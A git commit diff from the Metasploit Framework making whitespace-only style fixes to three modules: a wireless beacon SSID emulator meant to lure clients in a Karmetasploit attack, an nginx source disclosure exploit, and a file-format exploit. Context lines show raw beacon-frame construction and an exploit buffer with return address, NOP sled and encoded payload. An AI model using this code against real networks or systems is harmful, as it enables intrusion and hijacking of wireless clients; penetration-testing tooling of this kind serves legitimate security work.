style compliance fixes

git-svn-id: file:///home/svn/framework3/trunk@10010 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-08-13 23:11:14 +00:00
parent c8aa885e5a
commit acb82fa857
3 changed files with 17 additions and 18 deletions

View File

@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -19,12 +19,12 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Wireless Beacon SSID Emulator',
'Description' => %q{
This module sends out beacon frames using SSID's identified in a specified file and randomly selected BSSID's. This is useful when combined with a Karmetasploit attack to get clients configured to not probe for networks in their PNL to start probing when they see a matching SSID in from this script. For a list of common SSID's to use with this script, check http://www.wigle.net/gps/gps/main/ssidstats. If a file of SSID's is not specified, a default list of 20 SSID's will be used. This script will run indefinitely until interrupted.
},
'Author' => [ 'joswr1ght', 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$'
@ -32,16 +32,16 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('SSIDS_FILE', [ false, "Filename of SSID's to broadcast, one per line"])
], self.class)
], self.class)
end
def run
@@uni = 0
frames = []
open_wifi
ssidlist = []
@ -58,9 +58,9 @@ class Metasploit3 < Msf::Auxiliary
else
ssidlist = ["linksys", "default", "NETGEAR", "Belkin54g", "Wireless", "WLAN", "home", "DLINK", "smc", "tsunami", "tmobile", "101", "panera", "hhonors", "GlobalSuiteWireless", "Internet", "WiFi", "public", "guest", "test"]
end
print_status("Sending beacon frames...")
while (true)
ssidlist.each do |ssid|
#print_status("Sending frame for SSID #{ssid}")
@ -77,19 +77,19 @@ class Metasploit3 < Msf::Auxiliary
bssid = "0" + ssid[0..4]
seq = [rand(255)].pack('n')
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
"\x00\x00" + # duration
"\xff\xff\xff\xff\xff\xff" + # dst
bssid + # src
bssid + # bssid
seq + # seq
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x04\x01" + # capability flags
# ssid tag
"\x00" + ssid.length.chr + ssid +

View File

@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
'Version' => '$Revision$',
'Description' => %q{
This module exploits a source code disclosure/download vulnerability in
versions 0.7 and 0.8 of the nginx web server. Versions 0.7.66 and 0.8.40
versions 0.7 and 0.8 of the nginx web server. Versions 0.7.66 and 0.8.40
correct this vulnerability.
},
'References' =>

View File

@ -1,4 +1,3 @@
##
# $Id$
##
@ -73,11 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote
sploit << [target.ret].pack('V') # Offset
sploit << "\x90" * 8
sploit << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end